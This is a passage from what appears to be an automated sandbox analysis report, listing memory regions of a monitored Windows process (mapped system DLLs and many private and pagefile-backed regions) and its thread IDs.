0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2112 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2113 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2114 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2115 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2116 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2117 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2118 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2119 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2120 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2121 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2122 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2123 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2124 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2125 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2126 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2127 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2128 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2129 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2130 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2131 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2132 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2133 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2134 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2135 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2136 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 98 os_tid = 0xf28 Thread: id = 99 os_tid = 0xdb4 Thread: id = 100 os_tid = 0xda8 Thread: id = 101 os_tid = 0x598 Thread: id = 102 os_tid = 0x4c0 Thread: id = 103 os_tid = 0x4d4 Thread: id = 104 os_tid = 0x40c Thread: id = 105 os_tid = 0x5d4 Thread: id = 106 os_tid = 0x5fc Thread: id = 107 os_tid = 0x5f4 Thread: id = 108 os_tid = 0x5ec Thread: id = 109 os_tid = 0x558 Thread: id = 110 os_tid = 0x460 Thread: id = 111 os_tid = 0x448 Thread: id = 112 os_tid = 0x3b0 Thread: id = 113 os_tid = 0x3a8 Thread: id = 114 os_tid = 0x398 Thread: id = 115 os_tid = 0x2f8 Thread: id = 116 os_tid = 0x2f4 Thread: id = 117 os_tid = 0x2d0 Thread: id = 118 os_tid = 0x2c4 Thread: id = 119 os_tid = 0xf64 Thread: id = 120 os_tid = 0xf7c